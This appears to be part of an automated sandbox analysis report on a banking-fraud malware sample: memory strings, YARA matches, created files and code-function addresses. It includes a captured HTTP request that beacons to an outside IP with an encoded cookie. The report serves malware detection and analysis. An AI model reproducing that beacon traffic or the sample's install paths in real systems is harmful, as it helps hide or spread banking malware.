                      Source: svchost.exe, 0000000A.00000003.317155113.000001E56064A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.317155113.000001E56064A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000A.00000002.317649151.000001E56064C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317155113.000001E56064A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000A.00000002.317619964.000001E560629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000A.00000003.317134362.000001E560651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000A.00000002.317636438.000001E56063E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.295352509.000001E560630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000003.295352509.000001E560630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000A.00000003.295352509.000001E560630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/roadshield.ashx?bucket=
                      Source: svchost.exe, 0000001D.00000003.589568210.0000022906A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589718367.00000229065AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589683273.000002290659D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589628000.0000022906A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589768932.0000022906A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589743080.0000022906584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                      Source: svchost.exe, 0000000A.00000002.317636438.000001E56063E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000A.00000002.317636438.000001E56063E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.317604336.000001E560613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.317169399.000001E560641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317181225.000001E560646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.317169399.000001E560641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317181225.000001E560646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.295352509.000001E560630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.295352509.000001E560630000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.317619964.000001E560629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000A.00000003.317186097.000001E56063A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: svchost.exe, 0000001D.00000003.594537232.00000229065A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.594593800.0000022906586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 0000001D.00000003.594537232.00000229065A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.594593800.0000022906586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 0000001D.00000003.589568210.0000022906A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589718367.00000229065AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589683273.000002290659D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589628000.0000022906A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589768932.0000022906A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589743080.0000022906584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                      Source: svchost.exe, 0000001D.00000003.589568210.0000022906A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589718367.00000229065AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589683273.000002290659D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589628000.0000022906A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589768932.0000022906A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.589743080.0000022906584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                      Source: svchost.exe, 0000001D.00000003.598967069.0000022906A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.598863464.00000229065B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.598935520.0000022906584000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.598896455.00000229065B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.598914076.00000229065A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800132F0 InternetReadFile,RtlAllocateHeap,
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: QRIFweiGKVI=h7VegJdmf4xfFFY0QYrxZdstx2kYWXdTstAUTv1fb+WsjLhO8tel9R7uFuWFo2xXJHDd3gjQ6kH0iMy9uU8gc4ZYIxUoNhr5xDSF6nCBjAWyOhB4Utfg5CPFQewAuYEt9x47MOitgo8o4jp+h4lcVMyxOmpNT6WAdcmNzkO1ggkYOdyn6AMcQmNQd52VrPXXGfml0S5M/DuKlS9S14SJSjRbstms/WbaagCawUx6mENt/agbYDUjWaaNo2J5C70=Host: 23.239.0.12Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.4:49768 version: TLS 1.2

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 2.2.regsvr32.exe.eb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1bf264f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.6e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1bf264f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.26c83780000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.26c83780000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.eb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.6e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.286004356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.282888482.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.665179652.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.664928171.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.284149988.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.285867469.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.284635526.000001BF264F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.284298994.0000026C83780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\regsvr32.exeFile deleted: C:\Windows\System32\LqleYRChPKuppQ\QMAA.dll:Zone.IdentifierJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\LqleYRChPKuppQ\Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFF0C9FCA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFF0C9AA0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFF0C9B5CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFF0C9895C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFF0C95944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFF0C96F0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFF0C9E6C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFF0C9A77C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFF0C9AF70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFF0C9FB6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFF0C9EB60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00EA0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180010FF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180028C20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180009100
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180007958
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000C608
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180021618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180013E28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E3AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DBE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001FC0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000580C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180022010
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001481C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180011834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180023831
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180021C3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000703C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000AC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000FC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180006458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C05C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001A460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180029888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D49C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180008CA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800248A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180015CB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800124B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000C4B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800288B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800024B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000D8C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800250CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800190D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017CE4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800264F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800014F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180020CFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180021510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F917
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000551C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001CD38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180016D3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180018148
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D950
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180013150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001ED50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E960
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019D60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C964
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180001D68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001496C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180002D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180002178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180024D80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180018598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180003598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002A9A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800119A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180025DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180018DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800269B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800059B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800029BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800141C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800125C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800121CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800075D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800095DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F9E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180002610
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001FA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000A270
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019E78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DA80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180024698
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000EE98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800176B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AAB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180011AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180008AD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800296EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000A6EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800132F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019300
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002870C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180026B10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000131C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000671C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180029B28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180012F28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000BB28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001EB30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180020334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180010758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001435C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180009F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180029368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180020768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180013780
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180015388
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000338C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000738C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180002790
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180027F9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800197A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C7B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DFB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F7C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800097C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800157D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019FDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017BDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F7E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180001FE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180010FF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002C058
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180009100
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000C608
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180021618
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001E3AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001DBE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001FC0C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000580C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180022010
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001481C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002A42C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180011834
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180021C3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000703C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000AC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000FC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180006458
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001C05C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001A460
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180029888
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001D49C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180008CA0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800248A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180015CB0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800124B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000C4B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800288B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800024B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000D8C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800250CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800190D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180017CE4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800264F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800014F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180020CFC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002C904
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180017908
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180021510
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000F917
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000551C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000F128
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001CD38
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180016D3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001F944
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180018148
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001ED50
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180013150
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001D950
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001E960
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180019D60
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001C964
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180001D68
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001496C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180002D70
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180002178
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180024D80
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180018598
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180003598
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002A9A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800119A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180025DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180018DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800269B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800059B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800029BC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800141C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800125C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800121CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800075D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800095DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000F9E8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180002610
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180019618
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180013E28
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001FA38
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000A270
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180019E78
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001DA80
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180024698
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000EE98
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800176B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AAB8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180011AD0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180008AD8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800296EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000A6EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800132F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180019300
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BB04
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002870C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180026B10
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000131C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000671C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180029B28
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180012F28
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000BB28
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001EB30
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180020334
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180010758
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001435C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180009F5C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180029368
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180020768
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180017378
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180013780
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180015388
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000338C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000738C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180002790
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800197A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002C7B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001DFB4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001F7C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800097C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800157D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180019FDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180017BDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000F7E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180001FE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000001BF264E0000
